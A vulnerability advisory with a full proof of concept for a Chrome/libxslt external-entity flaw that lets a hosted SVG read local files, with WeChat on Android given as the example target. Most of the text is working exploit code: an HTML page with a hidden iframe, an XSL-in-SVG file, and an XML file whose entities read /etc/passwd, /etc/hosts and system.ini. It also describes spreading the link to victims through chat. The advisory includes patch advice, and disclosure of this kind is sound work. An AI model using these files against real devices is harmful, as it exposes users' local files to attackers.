1. Vulnerability description

Google ChromeIt is a web browser developed by Google. The browser is written based on an open source kernel (such as WebKit), with the goal of improving stability, speed and security, and creating a simple and efficient user interface. The xsl library (Libxslt) used by WebKit by default, the document loaded by calling document() contains references to external entities. An attacker can create and host SVG images containing XSL stylesheets and documents containing references to external entities.

When a victim accesses an SVG image link, the browser parses the XSL stylesheet, calls document() to load the document containing references to external entities, and reads arbitrary files on the victim's machine.

2. Impact of vulnerabilities

Chrome version < 116.0.5845.96
Chromium version < 116.0.5845.96
Electron version < 26.1.0

Domestic impact:

Applications using the Google Chrome kernel are basically affected, such as: WeChat Mobile, Alipay, Douyin, Ctrip, Xiaomi (with its own browser), UC Browser, via Browser, Quark Browser, etc. (these are November Tested on the evening of the 19th)

3. Vulnerability verification

Take the Android version of WeChat as an example to read the /etc/hosts file on the mobile phone: The WeChat version of the test environment is the latest version 8.0.43

Construct three files and deploy them on the server

c.html

<body>
<div id="r"></div>
<script>
const ifr = document.createElement('iframe');
ifr.style.display = 'none';
document.body.appendChild(ifr);
ifr.onload = function() {
const ifrContent = ifr.contentWindow.document.documentElement.innerHTML;
r.innerHTML = `current url:<br />${location.href}<br /><br />get data:<br />${ifrContent}`;
}
ifr.src = "./c2.svg";

var data = `current url:<br />${location.href}<br /><br />get data:<br />${ifrContent}`;
alert(data);
</script>
</body>

c2.svg
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<svg width="10000%" height="10000%" version="1.1" xmlns="http://www.w3.org/2000/svg">
<foreignobject class="node" font-size="18" width="100%" height="100%">
<body xmlns="http://www.w3.org/1999/xhtml">
<xmp>
<xsl:copy-of select="document('./c3.xml')"/>
</xmp>
</body>
</foreignobject>
</svg>
</xsl:template>
</xsl:stylesheet>

c3.xml
<!DOCTYPE p [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY group SYSTEM "file://localhost/etc/group">
<!ENTITY sysini SYSTEM "file:///c:/windows/system.ini">
]>
<p>
<p style="border-style: dotted;">/etc/passwd: &amp;passwd;
</p>
<p style="border-style: dotted;" id="hosts">/etc/hosts: &amp;hosts;
</p>
<p style="border-style: dotted;">/etc/group: &amp;group;
</p>
<p style="border-style: dotted;">c:/windows/system32.ini: &amp;sysini;
</p>
</p>

After creating the three files, upload them to the server for deployment, and send the constructed link to any friend through the conversation box. Here I will demonstrate sending it to the file transfer assistant, and then click the link to return the read file successfully.

4. Vulnerability repair suggestions

1. Upgrade the built-in browser version of the application;

2. Users should not click on unfamiliar links to prevent being attacked.